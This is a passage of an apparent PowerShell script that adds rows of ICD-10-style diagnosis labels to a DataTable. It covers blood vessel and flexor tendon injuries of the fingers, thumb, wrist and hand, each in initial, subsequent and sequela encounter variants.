finger","Laceration of blood vessel of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right index finger","Laceration of blood vessel of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right index finger","Laceration of blood vessel of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left index finger","Laceration of blood vessel of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left index finger","Laceration of blood vessel of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left index finger","Laceration of blood vessel of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right middle finger","Laceration of blood vessel of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right middle finger","Laceration of blood vessel of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right middle finger","Laceration of blood vessel of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left middle finger","Laceration of blood vessel of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left middle finger","Laceration of blood vessel of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left middle finger","Laceration of blood vessel of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right ring finger","Laceration of blood vessel of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right ring finger","Laceration of blood vessel of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right ring finger","Laceration of blood vessel of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left ring finger","Laceration of blood vessel of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left ring finger","Laceration of blood vessel of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left ring finger","Laceration of blood vessel of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right little finger","Laceration of blood vessel of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right little finger","Laceration of blood vessel of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right little finger","Laceration of blood vessel of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left little finger","Laceration of blood vessel of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left little finger","Laceration of blood vessel of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left little finger","Laceration of blood vessel of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of other finger","Laceration of blood vessel of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of other finger","Laceration of blood vessel of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of other finger","Laceration of blood vessel of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified finger","Laceration of blood vessel of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified finger","Laceration of blood vessel of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified finger","Laceration of blood vessel of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right index finger","Other specified injury of blood vessel of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right index finger","Other specified injury of blood vessel of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right index finger","Other specified injury of blood vessel of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left index finger","Other specified injury of blood vessel of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left index finger","Other specified injury of blood vessel of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left index finger","Other specified injury of blood vessel of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right middle finger","Other specified injury of blood vessel of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right middle finger","Other specified injury of blood vessel of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right middle finger","Other specified injury of blood vessel of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left middle finger","Other specified injury of blood vessel of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left middle finger","Other specified injury of blood vessel of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left middle finger","Other specified injury of blood vessel of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right ring finger","Other specified injury of blood vessel of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right ring finger","Other specified injury of blood vessel of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right ring finger","Other specified injury of blood vessel of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left ring finger","Other specified injury of blood vessel of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left ring finger","Other specified injury of blood vessel of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left ring finger","Other specified injury of blood vessel of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right little finger","Other specified injury of blood vessel of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right little finger","Other specified injury of blood vessel of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right little finger","Other specified injury of blood vessel of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left little finger","Other specified injury of blood vessel of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left little finger","Other specified injury of blood vessel of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left little finger","Other specified injury of blood vessel of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of other finger","Other specified injury of blood vessel of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of other finger","Other specified injury of blood vessel of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of other finger","Other specified injury of blood vessel of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified finger","Other specified injury of blood vessel of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified finger","Other specified injury of blood vessel of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified finger","Other specified injury of blood vessel of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of right arm","Unspecified injury of other blood vessels at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of right arm","Unspecified injury of other blood vessels at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of right arm","Unspecified injury of other blood vessels at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of left arm","Unspecified injury of other blood vessels at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of left arm","Unspecified injury of other blood vessels at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of left arm","Unspecified injury of other blood vessels at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of unspecified arm","Unspecified injury of other blood vessels at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of unspecified arm","Unspecified injury of other blood vessels at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at wrist and hand level of unspecified arm","Unspecified injury of other blood vessels at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of right arm","Laceration of other blood vessels at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of right arm","Laceration of other blood vessels at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of right arm","Laceration of other blood vessels at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of left arm","Laceration of other blood vessels at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of left arm","Laceration of other blood vessels at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of left arm","Laceration of other blood vessels at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of unspecified arm","Laceration of other blood vessels at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of unspecified arm","Laceration of other blood vessels at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at wrist and hand level of unspecified arm","Laceration of other blood vessels at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of right arm","Other specified injury of other blood vessels at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of right arm","Other specified injury of other blood vessels at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of right arm","Other specified injury of other blood vessels at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of left arm","Other specified injury of other blood vessels at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of left arm","Other specified injury of other blood vessels at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of left arm","Other specified injury of other blood vessels at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of unspecified arm","Other specified injury of other blood vessels at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of unspecified arm","Other specified injury of other blood vessels at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at wrist and hand level of unspecified arm","Other specified injury of other blood vessels at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of right arm","Unspecified injury of unspecified blood vessel at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of right arm","Unspecified injury of unspecified blood vessel at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of right arm","Unspecified injury of unspecified blood vessel at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of left arm","Unspecified injury of unspecified blood vessel at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of left arm","Unspecified injury of unspecified blood vessel at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of left arm","Unspecified injury of unspecified blood vessel at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm","Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm","Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm","Unspecified injury of unspecified blood vessel at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of right arm","Laceration of unspecified blood vessel at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of right arm","Laceration of unspecified blood vessel at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of right arm","Laceration of unspecified blood vessel at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of left arm","Laceration of unspecified blood vessel at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of left arm","Laceration of unspecified blood vessel at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of left arm","Laceration of unspecified blood vessel at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of unspecified arm","Laceration of unspecified blood vessel at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of unspecified arm","Laceration of unspecified blood vessel at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at wrist and hand level of unspecified arm","Laceration of unspecified blood vessel at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of right arm","Other specified injury of unspecified blood vessel at wrist and hand of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of right arm","Other specified injury of unspecified blood vessel at wrist and hand of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of right arm","Other specified injury of unspecified blood vessel at wrist and hand of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of left arm","Other specified injury of unspecified blood vessel at wrist and hand of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of left arm","Other specified injury of unspecified blood vessel at wrist and hand of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of left arm","Other specified injury of unspecified blood vessel at wrist and hand of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm","Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm","Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm","Other specified injury of unspecified blood vessel at wrist and hand of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of long flexor muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of flexor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level","Strain of flexor muscle, fascia and tendon of left index finger at wrist and hand level, 